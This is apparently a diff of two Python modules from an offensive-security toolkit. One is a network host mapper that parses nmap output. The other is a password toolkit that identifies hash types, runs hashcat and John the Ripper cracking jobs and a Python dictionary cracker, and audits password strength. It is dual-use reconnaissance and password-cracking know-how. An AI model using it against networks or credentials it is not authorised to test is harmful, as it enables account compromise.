||||
def save_scan(self, name: str, hosts: List[dict]) -> dict:
|
||||
"""Save a network scan for later comparison."""
|
||||
scan = {
|
||||
'name': name,
|
||||
'timestamp': datetime.now(timezone.utc).isoformat(),
|
||||
'hosts': hosts,
|
||||
'host_count': len(hosts),
|
||||
}
|
||||
path = os.path.join(self._data_dir, f'scan_{name}_{int(time.time())}.json')
|
||||
with open(path, 'w') as f:
|
||||
json.dump(scan, f, indent=2)
|
||||
return {'ok': True, 'path': path}
|
||||
|
||||
def list_scans(self) -> List[dict]:
|
||||
scans = []
|
||||
for f in Path(self._data_dir).glob('scan_*.json'):
|
||||
try:
|
||||
with open(f, 'r') as fh:
|
||||
data = json.load(fh)
|
||||
scans.append({
|
||||
'file': f.name,
|
||||
'name': data.get('name', ''),
|
||||
'timestamp': data.get('timestamp', ''),
|
||||
'host_count': data.get('host_count', 0),
|
||||
})
|
||||
except Exception:
|
||||
continue
|
||||
return sorted(scans, key=lambda s: s.get('timestamp', ''), reverse=True)
|
||||
|
||||
def load_scan(self, filename: str) -> Optional[dict]:
|
||||
path = os.path.join(self._data_dir, filename)
|
||||
if os.path.exists(path):
|
||||
with open(path, 'r') as f:
|
||||
return json.load(f)
|
||||
return None
|
||||
|
||||
def diff_scans(self, scan1_file: str, scan2_file: str) -> dict:
|
||||
"""Compare two scans and find differences."""
|
||||
s1 = self.load_scan(scan1_file)
|
||||
s2 = self.load_scan(scan2_file)
|
||||
if not s1 or not s2:
|
||||
return {'ok': False, 'error': 'Scan(s) not found'}
|
||||
|
||||
ips1 = {h['ip'] for h in s1.get('hosts', [])}
|
||||
ips2 = {h['ip'] for h in s2.get('hosts', [])}
|
||||
|
||||
return {
|
||||
'ok': True,
|
||||
'new_hosts': sorted(ips2 - ips1),
|
||||
'removed_hosts': sorted(ips1 - ips2),
|
||||
'unchanged_hosts': sorted(ips1 & ips2),
|
||||
'scan1': {'name': s1.get('name'), 'timestamp': s1.get('timestamp'),
|
||||
'count': len(ips1)},
|
||||
'scan2': {'name': s2.get('name'), 'timestamp': s2.get('timestamp'),
|
||||
'count': len(ips2)},
|
||||
}
|
||||
|
||||
def get_job_status(self, job_id: str) -> dict:
|
||||
holder = self._active_jobs.get(job_id)
|
||||
if not holder:
|
||||
return {'ok': False, 'error': 'Job not found'}
|
||||
result = {'ok': True, 'done': holder['done'], 'hosts': holder['hosts']}
|
||||
if holder.get('error'):
|
||||
result['error'] = holder['error']
|
||||
if holder['done']:
|
||||
self._active_jobs.pop(job_id, None)
|
||||
return result
|
||||
|
||||
# ── Topology Data (for visualization) ─────────────────────────────────
|
||||
|
||||
def build_topology(self, hosts: List[dict]) -> dict:
|
||||
"""Build topology graph data from host list for visualization."""
|
||||
nodes = []
|
||||
edges = []
|
||||
subnets = {}
|
||||
|
||||
for h in hosts:
|
||||
subnet = '.'.join(h['ip'].split('.')[:3]) + '.0/24'
|
||||
if subnet not in subnets:
|
||||
subnets[subnet] = {
|
||||
'id': f'subnet_{subnet}', 'label': subnet,
|
||||
'type': 'subnet', 'hosts': [],
|
||||
}
|
||||
subnets[subnet]['hosts'].append(h['ip'])
|
||||
|
||||
node_type = 'host'
|
||||
if h.get('ports'):
|
||||
services = [p.get('service', '') for p in h['ports']]
|
||||
if any('http' in s.lower() for s in services):
|
||||
node_type = 'web'
|
||||
elif any('ssh' in s.lower() for s in services):
|
||||
node_type = 'server'
|
||||
elif any('smb' in s.lower() or 'netbios' in s.lower() for s in services):
|
||||
node_type = 'windows'
|
||||
|
||||
nodes.append({
|
||||
'id': h['ip'],
|
||||
'label': h.get('hostname') or h['ip'],
|
||||
'ip': h['ip'],
|
||||
'type': node_type,
|
||||
'os': h.get('os_guess', ''),
|
||||
'ports': len(h.get('ports', [])),
|
||||
'subnet': subnet,
|
||||
})
|
||||
|
||||
# Edge from host to subnet gateway
|
||||
gateway = '.'.join(h['ip'].split('.')[:3]) + '.1'
|
||||
edges.append({'from': h['ip'], 'to': gateway, 'type': 'network'})
|
||||
|
||||
# Add subnet nodes
|
||||
for subnet_data in subnets.values():
|
||||
nodes.append(subnet_data)
|
||||
|
||||
return {
|
||||
'nodes': nodes,
|
||||
'edges': edges,
|
||||
'subnets': list(subnets.keys()),
|
||||
'total_hosts': len(hosts),
|
||||
}
|
||||
|
||||
# ── Helpers ───────────────────────────────────────────────────────────
|
||||
|
||||
def _expand_target(self, target: str) -> List[str]:
|
||||
"""Expand CIDR or range to list of IPs."""
|
||||
if '/' in target:
|
||||
return self._cidr_to_ips(target)
|
||||
if '-' in target.split('.')[-1]:
|
||||
base = '.'.join(target.split('.')[:3])
|
||||
range_part = target.split('.')[-1]
|
||||
if '-' in range_part:
|
||||
start, end = range_part.split('-')
|
||||
return [f'{base}.{i}' for i in range(int(start), int(end) + 1)]
|
||||
return [target]
|
||||
|
||||
@staticmethod
|
||||
def _cidr_to_ips(cidr: str) -> List[str]:
|
||||
parts = cidr.split('/')
|
||||
if len(parts) != 2:
|
||||
return [cidr]
|
||||
ip = parts[0]
|
||||
prefix = int(parts[1])
|
||||
if prefix < 16:
|
||||
return [ip] # Too large, don't expand
|
||||
ip_int = struct.unpack('!I', socket.inet_aton(ip))[0]
|
||||
mask = (0xFFFFFFFF << (32 - prefix)) & 0xFFFFFFFF
|
||||
network = ip_int & mask
|
||||
broadcast = network | (~mask & 0xFFFFFFFF)
|
||||
return [socket.inet_ntoa(struct.pack('!I', i))
|
||||
for i in range(network + 1, broadcast)]
|
||||
|
||||
def _parse_nmap_xml(self, xml_text: str) -> List[Host]:
|
||||
"""Parse nmap XML output to Host objects."""
|
||||
hosts = []
|
||||
try:
|
||||
import xml.etree.ElementTree as ET
|
||||
root = ET.fromstring(xml_text)
|
||||
for host_el in root.findall('.//host'):
|
||||
state = host_el.find('status')
|
||||
if state is not None and state.get('state') != 'up':
|
||||
continue
|
||||
addr = host_el.find("address[@addrtype='ipv4']")
|
||||
if addr is None:
|
||||
continue
|
||||
ip = addr.get('addr', '')
|
||||
mac_el = host_el.find("address[@addrtype='mac']")
|
||||
hostname_el = host_el.find('.//hostname')
|
||||
os_el = host_el.find('.//osmatch')
|
||||
|
||||
h = Host(
|
||||
ip=ip,
|
||||
mac=mac_el.get('addr', '') if mac_el is not None else '',
|
||||
hostname=hostname_el.get('name', '') if hostname_el is not None else '',
|
||||
os_guess=os_el.get('name', '') if os_el is not None else '',
|
||||
subnet='.'.join(ip.split('.')[:3]) + '.0/24',
|
||||
)
|
||||
|
||||
for port_el in host_el.findall('.//port'):
|
||||
state_el = port_el.find('state')
|
||||
if state_el is not None and state_el.get('state') == 'open':
|
||||
svc_el = port_el.find('service')
|
||||
h.ports.append({
|
||||
'port': int(port_el.get('portid', 0)),
|
||||
'protocol': port_el.get('protocol', 'tcp'),
|
||||
'state': 'open',
|
||||
'service': svc_el.get('name', '') if svc_el is not None else '',
|
||||
'version': svc_el.get('version', '') if svc_el is not None else '',
|
||||
})
|
||||
hosts.append(h)
|
||||
except Exception:
|
||||
pass
|
||||
return hosts
|
||||
|
||||
@staticmethod
|
||||
def _guess_service(port: int) -> str:
|
||||
services = {
|
||||
21: 'ftp', 22: 'ssh', 23: 'telnet', 25: 'smtp', 53: 'dns',
|
||||
80: 'http', 110: 'pop3', 143: 'imap', 443: 'https', 445: 'smb',
|
||||
993: 'imaps', 995: 'pop3s', 3306: 'mysql', 3389: 'rdp',
|
||||
5432: 'postgresql', 5900: 'vnc', 6379: 'redis', 8080: 'http-alt',
|
||||
8443: 'https-alt', 27017: 'mongodb',
|
||||
}
|
||||
return services.get(port, '')
|
||||
|
||||
|
||||
# ── Singleton ─────────────────────────────────────────────────────────────────
|
||||
|
||||
_instance = None
|
||||
_lock = threading.Lock()
|
||||
|
||||
|
||||
def get_net_mapper() -> NetMapper:
|
||||
global _instance
|
||||
if _instance is None:
|
||||
with _lock:
|
||||
if _instance is None:
|
||||
_instance = NetMapper()
|
||||
return _instance
|
||||
|
||||
|
||||
# ── CLI ───────────────────────────────────────────────────────────────────────
|
||||
|
||||
def run():
|
||||
"""Interactive CLI for Network Mapper."""
|
||||
svc = get_net_mapper()
|
||||
|
||||
while True:
|
||||
print("\n╔═══════════════════════════════════════╗")
|
||||
print("║ NETWORK TOPOLOGY MAPPER ║")
|
||||
print("╠═══════════════════════════════════════╣")
|
||||
print("║ 1 — Discover Hosts ║")
|
||||
print("║ 2 — Scan Host (detailed) ║")
|
||||
print("║ 3 — List Saved Scans ║")
|
||||
print("║ 4 — Compare Scans ║")
|
||||
print("║ 0 — Back ║")
|
||||
print("╚═══════════════════════════════════════╝")
|
||||
|
||||
choice = input("\n Select: ").strip()
|
||||
|
||||
if choice == '0':
|
||||
break
|
||||
elif choice == '1':
|
||||
target = input(" Target (CIDR/range): ").strip()
|
||||
if not target:
|
||||
continue
|
||||
print(" Discovering hosts...")
|
||||
r = svc.discover_hosts(target)
|
||||
if r.get('job_id'):
|
||||
while True:
|
||||
time.sleep(2)
|
||||
s = svc.get_job_status(r['job_id'])
|
||||
if s['done']:
|
||||
hosts = s['hosts']
|
||||
print(f"\n Found {len(hosts)} hosts:")
|
||||
for h in hosts:
|
||||
ports = len(h.get('ports', []))
|
||||
print(f" {h['ip']:16s} {h.get('hostname',''):20s} "
|
||||
f"{h.get('os_guess',''):20s} {ports} ports")
|
||||
save = input("\n Save scan? (name/empty=skip): ").strip()
|
||||
if save:
|
||||
svc.save_scan(save, hosts)
|
||||
print(f" Saved as: {save}")
|
||||
break
|
||||
elif choice == '2':
|
||||
ip = input(" Host IP: ").strip()
|
||||
if not ip:
|
||||
continue
|
||||
print(" Scanning...")
|
||||
r = svc.scan_host(ip)
|
||||
if r.get('ok'):
|
||||
h = r['host']
|
||||
print(f"\n {h['ip']} — {h.get('os_guess', 'unknown OS')}")
|
||||
for p in h.get('ports', []):
|
||||
print(f" {p['port']:6d}/{p['protocol']} {p.get('service','')}"
|
||||
f" {p.get('version','')}")
|
||||
elif choice == '3':
|
||||
scans = svc.list_scans()
|
||||
if not scans:
|
||||
print("\n No saved scans.")
|
||||
continue
|
||||
for s in scans:
|
||||
print(f" {s['file']:40s} {s['name']:15s} "
|
||||
f"{s['host_count']} hosts {s['timestamp'][:19]}")
|
||||
elif choice == '4':
|
||||
scans = svc.list_scans()
|
||||
if len(scans) < 2:
|
||||
print(" Need at least 2 saved scans.")
|
||||
continue
|
||||
for i, s in enumerate(scans, 1):
|
||||
print(f" {i}. {s['file']} ({s['host_count']} hosts)")
|
||||
a = int(input(" Scan 1 #: ").strip()) - 1
|
||||
b = int(input(" Scan 2 #: ").strip()) - 1
|
||||
diff = svc.diff_scans(scans[a]['file'], scans[b]['file'])
|
||||
if diff.get('ok'):
|
||||
print(f"\n New hosts: {len(diff['new_hosts'])}")
|
||||
for h in diff['new_hosts']:
|
||||
print(f" + {h}")
|
||||
print(f" Removed hosts: {len(diff['removed_hosts'])}")
|
||||
for h in diff['removed_hosts']:
|
||||
print(f" - {h}")
|
||||
print(f" Unchanged: {len(diff['unchanged_hosts'])}")
|
||||
796
modules/password_toolkit.py
Normal file
796
modules/password_toolkit.py
Normal file
@ -0,0 +1,796 @@
|
||||
"""AUTARCH Password Toolkit
|
||||
|
||||
Hash identification, cracking (hashcat/john integration), password generation,
|
||||
credential spray/stuff testing, wordlist management, and password policy auditing.
|
||||
"""
|
||||
|
||||
DESCRIPTION = "Password cracking & credential testing"
|
||||
AUTHOR = "darkHal"
|
||||
VERSION = "1.0"
|
||||
CATEGORY = "analyze"
|
||||
|
||||
import os
|
||||
import re
|
||||
import json
|
||||
import time
|
||||
import string
|
||||
import secrets
|
||||
import hashlib
|
||||
import threading
|
||||
import subprocess
|
||||
from pathlib import Path
|
||||
from dataclasses import dataclass, field
|
||||
from typing import Dict, List, Optional, Any, Tuple
|
||||
|
||||
try:
|
||||
from core.paths import find_tool, get_data_dir
|
||||
except ImportError:
|
||||
import shutil
|
||||
def find_tool(name):
|
||||
return shutil.which(name)
|
||||
def get_data_dir():
|
||||
return str(Path(__file__).parent.parent / 'data')
|
||||
|
||||
|
||||
# ── Hash Type Signatures ──────────────────────────────────────────────────────
|
||||
|
||||
@dataclass
|
||||
class HashSignature:
|
||||
name: str
|
||||
regex: str
|
||||
hashcat_mode: int
|
||||
john_format: str
|
||||
example: str
|
||||
bits: int = 0
|
||||
|
||||
|
||||
HASH_SIGNATURES: List[HashSignature] = [
|
||||
HashSignature('MD5', r'^[a-fA-F0-9]{32}$', 0, 'raw-md5', 'd41d8cd98f00b204e9800998ecf8427e', 128),
|
||||
HashSignature('SHA-1', r'^[a-fA-F0-9]{40}$', 100, 'raw-sha1', 'da39a3ee5e6b4b0d3255bfef95601890afd80709', 160),
|
||||
HashSignature('SHA-224', r'^[a-fA-F0-9]{56}$', 1300, 'raw-sha224', 'd14a028c2a3a2bc9476102bb288234c415a2b01f828ea62ac5b3e42f', 224),
|
||||
HashSignature('SHA-256', r'^[a-fA-F0-9]{64}$', 1400, 'raw-sha256', 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', 256),
|
||||
HashSignature('SHA-384', r'^[a-fA-F0-9]{96}$', 10800,'raw-sha384', '38b060a751ac96384cd9327eb1b1e36a21fdb71114be07434c0cc7bf63f6e1da274edebfe76f65fbd51ad2f14898b95b', 384),
|
||||
HashSignature('SHA-512', r'^[a-fA-F0-9]{128}$', 1700, 'raw-sha512', 'cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e', 512),
|
||||
HashSignature('NTLM', r'^[a-fA-F0-9]{32}$', 1000, 'nt', '31d6cfe0d16ae931b73c59d7e0c089c0', 128),
|
||||
HashSignature('LM', r'^[a-fA-F0-9]{32}$', 3000, 'lm', 'aad3b435b51404eeaad3b435b51404ee', 128),
|
||||
HashSignature('bcrypt', r'^\$2[aby]?\$\d{1,2}\$[./A-Za-z0-9]{53}$', 3200, 'bcrypt', '$2b$12$LJ3m4ys3Lg2VBe5F.4oXzuLKmRPBRWvs5fS5K.zL1E8CfJzqS/VfO', 0),
|
||||
HashSignature('scrypt', r'^\$7\$', 8900, 'scrypt', '', 0),
|
||||
HashSignature('Argon2', r'^\$argon2(i|d|id)\$', 0, 'argon2', '', 0),
|
||||
HashSignature('MySQL 4.1+', r'^\*[a-fA-F0-9]{40}$', 300, 'mysql-sha1', '*6C8989366EAF6BCBBAA855D6DA93DE65C96D33D9', 160),
|
||||
HashSignature('SHA-512 Crypt', r'^\$6\$[./A-Za-z0-9]+\$[./A-Za-z0-9]{86}$', 1800, 'sha512crypt', '', 0),
|
||||
HashSignature('SHA-256 Crypt', r'^\$5\$[./A-Za-z0-9]+\$[./A-Za-z0-9]{43}$', 7400, 'sha256crypt', '', 0),
|
||||
HashSignature('MD5 Crypt', r'^\$1\$[./A-Za-z0-9]+\$[./A-Za-z0-9]{22}$', 500, 'md5crypt', '', 0),
|
||||
HashSignature('DES Crypt', r'^[./A-Za-z0-9]{13}$', 1500, 'descrypt', '', 0),
|
||||
HashSignature('APR1 MD5', r'^\$apr1\$', 1600, 'md5apr1', '', 0),
|
||||
HashSignature('Cisco Type 5', r'^\$1\$[./A-Za-z0-9]{8}\$[./A-Za-z0-9]{22}$', 500, 'md5crypt', '', 0),
|
||||
HashSignature('Cisco Type 7', r'^[0-9]{2}[0-9A-Fa-f]+$', 0, '', '', 0),
|
||||
HashSignature('PBKDF2-SHA256', r'^\$pbkdf2-sha256\$', 10900,'pbkdf2-hmac-sha256', '', 0),
|
||||
HashSignature('Django SHA256', r'^pbkdf2_sha256\$', 10000,'django', '', 0),
|
||||
HashSignature('CRC32', r'^[a-fA-F0-9]{8}$', 0, '', 'deadbeef', 32),
|
||||
]
|
||||
|
||||
|
||||
# ── Password Toolkit Service ─────────────────────────────────────────────────
|
||||
|
||||
class PasswordToolkit:
|
||||
"""Hash identification, cracking, generation, and credential testing."""
|
||||
|
||||
def __init__(self):
|
||||
self._data_dir = os.path.join(get_data_dir(), 'password_toolkit')
|
||||
self._wordlists_dir = os.path.join(self._data_dir, 'wordlists')
|
||||
self._results_dir = os.path.join(self._data_dir, 'results')
|
||||
os.makedirs(self._wordlists_dir, exist_ok=True)
|
||||
os.makedirs(self._results_dir, exist_ok=True)
|
||||
self._active_jobs: Dict[str, dict] = {}
|
||||
|
||||
# ── Hash Identification ───────────────────────────────────────────────
|
||||
|
||||
def identify_hash(self, hash_str: str) -> List[dict]:
|
||||
"""Identify possible hash types for a given hash string."""
|
||||
hash_str = hash_str.strip()
|
||||
matches = []
|
||||
for sig in HASH_SIGNATURES:
|
||||
if re.match(sig.regex, hash_str):
|
||||
matches.append({
|
||||
'name': sig.name,
|
||||
'hashcat_mode': sig.hashcat_mode,
|
||||
'john_format': sig.john_format,
|
||||
'bits': sig.bits,
|
||||
'confidence': self._hash_confidence(hash_str, sig),
|
||||
})
|
||||
# Sort by confidence
|
||||
matches.sort(key=lambda m: {'high': 0, 'medium': 1, 'low': 2}.get(m['confidence'], 3))
|
||||
return matches
|
||||
|
||||
def _hash_confidence(self, hash_str: str, sig: HashSignature) -> str:
|
||||
"""Estimate confidence of hash type match."""
|
||||
# bcrypt, scrypt, argon2, crypt formats are definitive
|
||||
if sig.name in ('bcrypt', 'scrypt', 'Argon2', 'SHA-512 Crypt',
|
||||
'SHA-256 Crypt', 'MD5 Crypt', 'APR1 MD5',
|
||||
'PBKDF2-SHA256', 'Django SHA256', 'MySQL 4.1+'):
|
||||
return 'high'
|
||||
# Length-based can be ambiguous (MD5 vs NTLM vs LM)
|
||||
if len(hash_str) == 32:
|
||||
return 'medium' # Could be MD5, NTLM, or LM
|
||||
if len(hash_str) == 8:
|
||||
return 'low' # CRC32 vs short hex
|
||||
return 'medium'
|
||||
|
||||
def identify_batch(self, hashes: List[str]) -> List[dict]:
|
||||
"""Identify types for multiple hashes."""
|
||||
results = []
|
||||
for h in hashes:
|
||||
h = h.strip()
|
||||
if not h:
|
||||
continue
|
||||
ids = self.identify_hash(h)
|
||||
results.append({'hash': h, 'types': ids})
|
||||
return results
|
||||
|
||||
# ── Hash Cracking ─────────────────────────────────────────────────────
|
||||
|
||||
def crack_hash(self, hash_str: str, hash_type: str = 'auto',
|
||||
wordlist: str = '', attack_mode: str = 'dictionary',
|
||||
rules: str = '', mask: str = '',
|
||||
tool: str = 'auto') -> dict:
|
||||
"""Start a hash cracking job.
|
||||
|
||||
attack_mode: 'dictionary', 'brute_force', 'mask', 'hybrid'
|
||||
tool: 'hashcat', 'john', 'auto' (try hashcat first, then john)
|
||||
"""
|
||||
hash_str = hash_str.strip()
|
||||
if not hash_str:
|
||||
return {'ok': False, 'error': 'No hash provided'}
|
||||
|
||||
# Auto-detect hash type if needed
|
||||
if hash_type == 'auto':
|
||||
ids = self.identify_hash(hash_str)
|
||||
if not ids:
|
||||
return {'ok': False, 'error': 'Could not identify hash type'}
|
||||
hash_type = ids[0]['name']
|
||||
|
||||
# Find cracking tool
|
||||
hashcat = find_tool('hashcat')
|
||||
john = find_tool('john')
|
||||
|
||||
if tool == 'auto':
|
||||
tool = 'hashcat' if hashcat else ('john' if john else None)
|
||||
elif tool == 'hashcat' and not hashcat:
|
||||
return {'ok': False, 'error': 'hashcat not found'}
|
||||
elif tool == 'john' and not john:
|
||||
return {'ok': False, 'error': 'john not found'}
|
||||
|
||||
if not tool:
|
||||
# Fallback: Python-based dictionary attack (slow but works)
|
||||
return self._python_crack(hash_str, hash_type, wordlist)
|
||||
|
||||
# Default wordlist
|
||||
if not wordlist:
|
||||
wordlist = self._find_default_wordlist()
|
||||
|
||||
job_id = f'crack_{int(time.time())}_{secrets.token_hex(4)}'
|
||||
|
||||
if tool == 'hashcat':
|
||||
return self._crack_hashcat(job_id, hash_str, hash_type,
|
||||
wordlist, attack_mode, rules, mask)
|
||||
else:
|
||||
return self._crack_john(job_id, hash_str, hash_type,
|
||||
wordlist, attack_mode, rules, mask)
|
||||
|
||||
def _crack_hashcat(self, job_id: str, hash_str: str, hash_type: str,
|
||||
wordlist: str, attack_mode: str, rules: str,
|
||||
mask: str) -> dict:
|
||||
"""Crack using hashcat."""
|
||||
hashcat = find_tool('hashcat')
|
||||
# Get hashcat mode
|
||||
mode = 0
|
||||
for sig in HASH_SIGNATURES:
|
||||
if sig.name == hash_type:
|
||||
mode = sig.hashcat_mode
|
||||
break
|
||||
|
||||
# Write hash to temp file
|
||||
hash_file = os.path.join(self._results_dir, f'{job_id}.hash')
|
||||
out_file = os.path.join(self._results_dir, f'{job_id}.pot')
|
||||
with open(hash_file, 'w') as f:
|
||||
f.write(hash_str + '\n')
|
||||
|
||||
cmd = [hashcat, '-m', str(mode), hash_file, '-o', out_file, '--potfile-disable']
|
||||
|
||||
attack_modes = {'dictionary': '0', 'brute_force': '3', 'mask': '3', 'hybrid': '6'}
|
||||
cmd.extend(['-a', attack_modes.get(attack_mode, '0')])
|
||||
|
||||
if attack_mode in ('dictionary', 'hybrid') and wordlist:
|
||||
cmd.append(wordlist)
|
||||
if attack_mode in ('brute_force', 'mask') and mask:
|
||||
cmd.append(mask)
|
||||
elif attack_mode == 'brute_force' and not mask:
|
||||
cmd.append('?a?a?a?a?a?a?a?a') # Default 8-char brute force
|
||||
if rules:
|
||||
cmd.extend(['-r', rules])
|
||||
|
||||
result_holder = {'result': None, 'done': False, 'process': None}
|
||||
self._active_jobs[job_id] = result_holder
|
||||
|
||||
def run_crack():
|
||||
try:
|
||||
proc = subprocess.run(cmd, capture_output=True, text=True, timeout=3600)
|
||||
result_holder['process'] = None
|
||||
cracked = ''
|
||||
if os.path.exists(out_file):
|
||||
with open(out_file, 'r') as f:
|
||||
cracked = f.read().strip()
|
||||
result_holder['result'] = {
|
||||
'ok': True,
|
||||
'cracked': cracked,
|
||||
'output': proc.stdout[-2000:] if proc.stdout else '',
|
||||
'returncode': proc.returncode,
|
||||
}
|
||||
except subprocess.TimeoutExpired:
|
||||
result_holder['result'] = {'ok': False, 'error': 'Crack timed out (1 hour)'}
|
||||
except Exception as e:
|
||||
result_holder['result'] = {'ok': False, 'error': str(e)}
|
||||
finally:
|
||||
result_holder['done'] = True
|
||||
|
||||
threading.Thread(target=run_crack, daemon=True).start()
|
||||
return {'ok': True, 'job_id': job_id, 'message': f'Cracking started with hashcat (mode {mode})'}
|
||||
|
||||
def _crack_john(self, job_id: str, hash_str: str, hash_type: str,
|
||||
wordlist: str, attack_mode: str, rules: str,
|
||||
mask: str) -> dict:
|
||||
"""Crack using John the Ripper."""
|
||||
john = find_tool('john')
|
||||
fmt = ''
|
||||
for sig in HASH_SIGNATURES:
|
||||
if sig.name == hash_type:
|
||||
fmt = sig.john_format
|
||||
break
|
||||
|
||||
hash_file = os.path.join(self._results_dir, f'{job_id}.hash')
|
||||
with open(hash_file, 'w') as f:
|
||||
f.write(hash_str + '\n')
|
||||
|
||||
cmd = [john, hash_file]
|
||||
if fmt:
|
||||
cmd.extend(['--format=' + fmt])
|
||||
if wordlist and attack_mode == 'dictionary':
|
||||
cmd.extend(['--wordlist=' + wordlist])
|
||||
if rules:
|
||||
cmd.extend(['--rules=' + rules])
|
||||
if attack_mode in ('mask', 'brute_force') and mask:
|
||||
cmd.extend(['--mask=' + mask])
|
||||
|
||||
result_holder = {'result': None, 'done': False}
|
||||
self._active_jobs[job_id] = result_holder
|
||||
|
||||
def run_crack():
|
||||
try:
|
||||
proc = subprocess.run(cmd, capture_output=True, text=True, timeout=3600)
|
||||
# Get cracked results
|
||||
show = subprocess.run([john, '--show', hash_file],
|
||||
capture_output=True, text=True, timeout=10)
|
||||
result_holder['result'] = {
|
||||
'ok': True,
|
||||
'cracked': show.stdout.strip() if show.stdout else '',
|
||||
'output': proc.stdout[-2000:] if proc.stdout else '',
|
||||
'returncode': proc.returncode,
|
||||
}
|
||||
except subprocess.TimeoutExpired:
|
||||
result_holder['result'] = {'ok': False, 'error': 'Crack timed out (1 hour)'}
|
||||
except Exception as e:
|
||||
result_holder['result'] = {'ok': False, 'error': str(e)}
|
||||
finally:
|
||||
result_holder['done'] = True
|
||||
|
||||
threading.Thread(target=run_crack, daemon=True).start()
|
||||
return {'ok': True, 'job_id': job_id, 'message': f'Cracking started with john ({fmt or "auto"})'}
|
||||
|
||||
def _python_crack(self, hash_str: str, hash_type: str,
|
||||
wordlist: str) -> dict:
|
||||
"""Fallback pure-Python dictionary crack for common hash types."""
|
||||
algo_map = {
|
||||
'MD5': 'md5', 'SHA-1': 'sha1', 'SHA-256': 'sha256',
|
||||
'SHA-512': 'sha512', 'SHA-224': 'sha224', 'SHA-384': 'sha384',
|
||||
}
|
||||
algo = algo_map.get(hash_type)
|
||||
if not algo:
|
||||
return {'ok': False, 'error': f'Python cracker does not support {hash_type}. Install hashcat or john.'}
|
||||
|
||||
if not wordlist:
|
||||
wordlist = self._find_default_wordlist()
|
||||
if not wordlist or not os.path.exists(wordlist):
|
||||
return {'ok': False, 'error': 'No wordlist available'}
|
||||
|
||||
hash_lower = hash_str.lower()
|
||||
tried = 0
|
||||
try:
|
||||
with open(wordlist, 'r', encoding='utf-8', errors='ignore') as f:
|
||||
for line in f:
|
||||
word = line.strip()
|
||||
if not word:
|
||||
continue
|
||||
h = hashlib.new(algo, word.encode('utf-8')).hexdigest()
|
||||
tried += 1
|
||||
if h == hash_lower:
|
||||
return {
|
||||
'ok': True,
|
||||
'cracked': f'{hash_str}:{word}',
|
||||
'plaintext': word,
|
||||
'tried': tried,
|
||||
'message': f'Cracked! Password: {word}',
|
||||
}
|
||||
if tried >= 10_000_000:
|
||||
break
|
||||
except Exception as e:
|
||||
return {'ok': False, 'error': str(e)}
|
||||
|
||||
return {'ok': True, 'cracked': '', 'tried': tried,
|
||||
'message': f'Not cracked. Tried {tried:,} candidates.'}
|
||||
|
||||
def get_crack_status(self, job_id: str) -> dict:
|
||||
"""Check status of a cracking job."""
|
||||
holder = self._active_jobs.get(job_id)
|
||||
if not holder:
|
||||
return {'ok': False, 'error': 'Job not found'}
|
||||
if not holder['done']:
|
||||
return {'ok': True, 'done': False, 'message': 'Cracking in progress...'}
|
||||
self._active_jobs.pop(job_id, None)
|
||||
return {'ok': True, 'done': True, **holder['result']}
|
||||
|
||||
# ── Password Generation ───────────────────────────────────────────────
|
||||
|
||||
def generate_password(self, length: int = 16, count: int = 1,
|
||||
uppercase: bool = True, lowercase: bool = True,
|
||||
digits: bool = True, symbols: bool = True,
|
||||
exclude_chars: str = '',
|
||||
pattern: str = '') -> List[str]:
|
||||
"""Generate secure random passwords."""
|
||||
if pattern:
|
||||
return [self._generate_from_pattern(pattern) for _ in range(count)]
|
||||
|
||||
charset = ''
|
||||
if uppercase:
|
||||
charset += string.ascii_uppercase
|
||||
if lowercase:
|
||||
charset += string.ascii_lowercase
|
||||
if digits:
|
||||
charset += string.digits
|
||||
if symbols:
|
||||
charset += '!@#$%^&*()-_=+[]{}|;:,.<>?'
|
||||
if exclude_chars:
|
||||
charset = ''.join(c for c in charset if c not in exclude_chars)
|
||||
if not charset:
|
||||
charset = string.ascii_letters + string.digits
|
||||
|
||||
length = max(4, min(length, 128))
|
||||
count = max(1, min(count, 100))
|
||||
|
||||
passwords = []
|
||||
for _ in range(count):
|
||||
pw = ''.join(secrets.choice(charset) for _ in range(length))
|
||||
passwords.append(pw)
|
||||
return passwords
|
||||
|
||||
def _generate_from_pattern(self, pattern: str) -> str:
|
||||
"""Generate password from pattern.
|
||||
?u = uppercase, ?l = lowercase, ?d = digit, ?s = symbol, ?a = any
|
||||
"""
|
||||
result = []
|
||||
i = 0
|
||||
while i < len(pattern):
|
||||
if pattern[i] == '?' and i + 1 < len(pattern):
|
||||
c = pattern[i + 1]
|
||||
if c == 'u':
|
||||
result.append(secrets.choice(string.ascii_uppercase))
|
||||
elif c == 'l':
|
||||
result.append(secrets.choice(string.ascii_lowercase))
|
||||
elif c == 'd':
|
||||
result.append(secrets.choice(string.digits))
|
||||
elif c == 's':
|
||||
result.append(secrets.choice('!@#$%^&*()-_=+'))
|
||||
elif c == 'a':
|
||||
result.append(secrets.choice(
|
||||
string.ascii_letters + string.digits + '!@#$%^&*'))
|
||||
else:
|
||||
result.append(pattern[i:i+2])
|
||||
i += 2
|
||||
else:
|
||||
result.append(pattern[i])
|
||||
i += 1
|
||||
return ''.join(result)
|
||||
|
||||
# ── Password Policy Audit ─────────────────────────────────────────────
|
||||
|
||||
def audit_password(self, password: str) -> dict:
|
||||
"""Audit a password against common policies and calculate entropy."""
|
||||
import math
|
||||
checks = {
|
||||
'length_8': len(password) >= 8,
|
||||
'length_12': len(password) >= 12,
|
||||
'length_16': len(password) >= 16,
|
||||
'has_uppercase': bool(re.search(r'[A-Z]', password)),
|
||||
'has_lowercase': bool(re.search(r'[a-z]', password)),
|
||||
'has_digit': bool(re.search(r'[0-9]', password)),
|
||||
'has_symbol': bool(re.search(r'[^A-Za-z0-9]', password)),
|
||||
'no_common_patterns': not self._has_common_patterns(password),
|
||||
'no_sequential': not self._has_sequential(password),
|
||||
'no_repeated': not self._has_repeated(password),
|
||||
}
|
||||
|
||||
# Calculate entropy
|
||||
charset_size = 0
|
||||
if re.search(r'[a-z]', password):
|
||||
charset_size += 26
|
||||
if re.search(r'[A-Z]', password):
|
||||
charset_size += 26
|
||||
if re.search(r'[0-9]', password):
|
||||
charset_size += 10
|
||||
if re.search(r'[^A-Za-z0-9]', password):
|
||||
charset_size += 32
|
||||
entropy = len(password) * math.log2(charset_size) if charset_size > 0 else 0
|
||||
|
||||
# Strength rating
|
||||
if entropy >= 80 and all(checks.values()):
|
||||
strength = 'very_strong'
|
||||
elif entropy >= 60 and checks['length_12']:
|
||||
